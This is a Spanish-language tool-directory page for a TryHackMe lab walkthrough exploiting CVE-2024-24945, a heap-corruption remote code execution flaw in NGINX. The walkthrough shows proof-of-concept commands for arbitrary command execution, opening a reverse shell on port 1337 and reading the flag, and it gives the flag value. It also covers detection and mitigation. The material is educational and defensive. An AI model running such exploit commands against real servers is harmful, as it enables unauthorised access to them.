Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — Este laboratorio demuestra la explotación de CVE-2024-24945, una vulnerabilidad de corrupción de heap que afecta a NGINX. El objetivo era comprender cómo la corrupción de memoria puede conducir a la Ejecución Remota de Código (RCE) y obtener experiencia práctica en técnicas de explotación, detección y mitigación. | Kitploit
Herramientas/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónExplotación de BinariosLabs y Práctica
GitHub
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

Ver Repositorio
4hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

Acerca de

Este laboratorio demuestra la explotación de CVE-2024-24945, una vulnerabilidad de corrupción de heap que afecta a NGINX. El objetivo era comprender cómo la corrupción de memoria puede conducir a la Ejecución Remota de Código (RCE) y obtener experiencia práctica en técnicas de explotación, detección y mitigación.

Compartir

CVE-2024-24945-NGINX-RIFT---Recorrido del Laboratorio de TryHackMe

Este laboratorio demuestra la explotación de CVE-2024-24945, una vulnerabilidad de corrupción del montón (heap corruption) que afecta a NGINX. El objetivo fue comprender cómo la corrupción de memoria puede provocar la ejecución remota de código (RCE) y adquirir experiencia práctica en técnicas de explotación, detección y mitigación.

Objetivos

. Verificar el servicio NGINX vulnerable. . Ejecutar comandos arbitrarios utilizando la prueba de concepto (PoC) proporcionada. . Obtener una reverse shell en el contenedor objetivo. . Recuperar la bandera del desafío. . Comprender las estrategias de detección y mitigación.

Entorno del Laboratorio

. Plataforma: TryHackMe . Servicio objetivo: NGINX RIFT . Entorno Contenerizado: Docker . Herramienta de Explotación: poc.py . Método de Acceso: VNC (Virtual Network Computing)

Metodología

  1. Verificación del Servicio

  2. Se confirmó que el contenedor vulnerable estaba en ejecución y accesible.

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

backend ok

  1. Ejecución Remota de Código

Se ejecutó la PoC proporcionada para validar la ejecución de comandos arbitrarios.

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

Se verificó la ejecución exitosa:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

Salida: hello from depthfirst

Acceso Reverse Shell

Establecer una shell interactiva en el contenedor objetivo.

root@kitploit:~
python3 poc.py --shell

Conexión Exitosa:

[] escuchando reverse shell en el puerto 1337... [] conectado. $

  1. Recuperación de la Bandera

Se accedió a la bandera del desafío.

root@kitploit:~
cat /flag.txt

Bandera:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

Oportunidades de Detección

Los defensores pueden identificar intentos de explotación mediante:

. Caídas del trabajador de NGINX . Eventos de fallo de segmentación . Conexiones de red salientes inesperadas . Procesos de shell sospechosos (/bin/sh, bash) . Creación de archivos no autorizada en directorios temporales

Estrategias de Mitigación

. Actualizar a una versión parcheada de NGINX. . Aplicar el principio de mínimo privilegio. . Restringir el tráfico de red saliente innecesario. . Implementar monitoreo continuo de registros. . Usar controles de seguridad de contenedores y monitoreo en tiempo de ejecución.

Conclusiones Clave

Este laboratorio proporcionó experiencia práctica en:

. Comprensión de vulnerabilidades de corrupción del montón. . Explotación de fallos de ejecución remota de código. . Establecimiento de reverse shells. . Realización de validación posterior a la explotación. . Reconocimiento de indicadores de compromiso y técnicas de mitigación.

Descargo de Responsabilidad

Este ejercicio se realizó en un entorno controlado de laboratorio de TryHackMe con fines educativos y de entrenamiento defensivo en ciberseguridad únicamente.

Autor: [Benedict Ejepu Amaechi] Plataforma: TryHackMe Tema: CVE-2024-24945 (NGINX RIFT) Explotación y Defensa Fecha de finalización: Junio 2026

Descargar herramienta